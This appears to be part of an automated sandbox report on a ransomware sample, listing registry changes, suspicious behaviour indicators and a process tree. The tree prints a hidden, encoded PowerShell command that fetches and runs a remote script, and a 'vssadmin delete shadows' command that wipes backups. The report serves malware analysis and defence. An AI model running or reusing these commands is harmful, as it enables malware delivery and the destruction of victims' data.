Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.cortana	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.cortana	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "56"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "364"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "364"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "0"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "0"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23"	SearchUI.exe
Key created	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "359"	SearchUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "493"	SearchUI.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1311743041-1167936498-546579926-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchUI.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

6416 NOTEPAD.EXE

pid	process
6416	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exepowershell.exeRansomware.CoronaVirus.exe

pid	process
380	chrome.exe
380	chrome.exe
3944	chrome.exe
3944	chrome.exe
4376	powershell.exe
4376	powershell.exe
4376	powershell.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe
5088	Ransomware.CoronaVirus.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

OpenWith.exetaskmgr.exe

pid process

6300 OpenWith.exe
11588 taskmgr.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

chrome.exe

pid process

380 chrome.exe
380 chrome.exe

pid	process
6300	OpenWith.exe
11588	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe
Token: SeShutdownPrivilege	380	chrome.exe
Token: SeCreatePagefilePrivilege	380	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe7zG.exe7zG.exetaskmgr.exe

pid	process
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
728	7zG.exe
5096	7zG.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
380	chrome.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe
11588	taskmgr.exe

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

SearchUI.exeOpenWith.exeSecHealthUI.exesystemreset.exe

pid	process
1824	SearchUI.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
6300	OpenWith.exe
9304	SecHealthUI.exe
5140	systemreset.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 380 wrote to memory of 2128	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2128	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2056	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2252	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 2252	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe
PID 380 wrote to memory of 4108	380	chrome.exe	chrome.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://github.com/topics/virus-library
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffaa4529758,0x7ffaa4529768,0x7ffaa4529778
2⤵
PID:2128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1580 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:2
2⤵
PID:2056

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:8
2⤵
PID:2252

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:8
2⤵
PID:4108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2976 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:1
2⤵
PID:3576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2964 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:1
2⤵
PID:4632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4968 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:8
2⤵
PID:4368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4656 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:8
2⤵
PID:4324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=164 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:8
2⤵
PID:676

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:8
2⤵
PID:2284

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=164 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3944

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:8
2⤵
PID:3344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 --field-trial-handle=1752,i,5699855529400739059,7239730911716151765,131072 /prefetch:8
2⤵
PID:1524

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1560

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3316

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\" -ad -an -ai#7zMap18361:190:7zEvent23379
1⤵
- Suspicious use of FindShellTrayWindow
PID:728

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b\3483446bca695be12b37d2e5bb78e751afe9be3bb52945835d966696e356a65b.js"
1⤵
PID:1128

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
2⤵
PID:3784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:4376

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4376 -s 2580
4⤵
- Program crash
PID:2848

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Ransomware.CoronaVirus\" -ad -an -ai#7zMap27972:106:7zEvent16165
1⤵
- Suspicious use of FindShellTrayWindow
PID:5096

C:\Users\Admin\Downloads\Ransomware.CoronaVirus\Ransomware.CoronaVirus.exe
"C:\Users\Admin\Downloads\Ransomware.CoronaVirus\Ransomware.CoronaVirus.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:5088

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
2⤵
PID:2100

C:\Windows\system32\mode.com
mode con cp select=1251
3⤵
PID:6420

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:7744

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe"
2⤵
PID:6156

C:\Windows\system32\mode.com
mode con cp select=1251
3⤵
PID:5252

C:\Windows\system32\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:5360

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
2⤵
PID:5520

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
2⤵
PID:5508

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1292

C:\Windows\system32\taskmgr.exe
